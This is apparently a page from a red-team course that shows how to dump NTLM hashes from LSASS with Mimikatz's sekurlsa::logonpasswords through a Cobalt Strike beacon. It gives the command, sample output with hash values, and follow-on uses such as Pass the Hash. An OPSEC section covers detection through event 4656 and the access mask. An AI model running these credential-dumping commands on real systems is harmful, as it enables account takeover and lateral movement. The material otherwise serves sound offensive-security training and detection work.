NTLM Hashes

The sekurlsa::logonpasswords Mimikatz module is infamous for being able to "dump plaintext passwords from memory". Having a user's password has obvious advantages and was a lucrative tactic for a long time. However, Microsoft have implemented a lot of mitigations in Windows 10 and above, such as disabling wdigest by default, so happening across plaintext passwords is certainly less common.

This module is still capable of retrieving NTLM hashes which is useful for pairing with the Pass the Hash or even cracking to recover the plaintext.

This command requires elevated privileges.

beacon> mimikatz !sekurlsa::logonpasswords

Authentication Id : 0 ; 579458 (00000000:0008d782)
Session           : Batch from 0
User Name         : jking
Domain            : DEV
Logon Server      : DC-2
Logon Time        : 8/31/2022 11:49:48 AM
SID               : S-1-5-21-569305411-121244042-2357301523-1105
	msv :
	 [00000003] Primary
	 * Username : jking
	 * Domain   : DEV
	 * NTLM     : 59fc0f884922b4ce376051134c71e22c
	 * SHA1     : 74fa9854d529092b92e0d9ebef7ce3d065027f45
	 * DPAPI    : 0837e40088a674327961e1d03946f5f2

Cobalt Strike also has a short-hand command for this called logonpasswords. After dumping these credentials, go to View > Credentials to see a copy of them.

OPSEC This module will open a read handle to LSASS which can be logged under event 4656. Use the "Suspicious Handle to LSASS" saved search in Kibana to see them.

This shows the user WKSTN-2$ (which means SYSTEM on WKSTN-2) obtained a handle to LSASS from powershell.exe with an access mask of 0x1010. This comes from the flags PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010), which is consistent with the Mimikatz source code.

Last updated